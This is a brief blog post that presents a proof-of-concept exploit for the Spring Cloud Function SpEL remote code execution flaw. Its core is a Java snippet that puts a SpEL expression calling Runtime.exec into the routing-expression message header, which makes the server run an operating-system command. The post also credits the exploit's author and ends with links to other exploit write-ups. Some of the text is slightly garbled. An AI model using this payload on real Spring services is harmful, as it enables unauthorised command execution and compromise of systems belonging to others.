Spring Cloud Function SPEL RCE Exploit


This is spring-cloud/spring-cloud-function Remote Code Exploit  POC"open -a")


Function function = functionCatalog.lookup(RoutingFunction.FUNCTION_NAME);
Message<String> message = MessageBuilder.withPayload("hello")
 				.setHeader(FunctionProperties.PREFIX + ".routing-expression",
 						"T(java.lang.Runtime).getRuntime().exec(\"open -a\")")

Exploit credits: hktalent

For More details on the Vulnerability read RCE 0-day Vulnerability found in Spring Cloud (SPEL)

What do you think?

Written by SH

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23

Microsoft Azure Defender for IoT Code Execution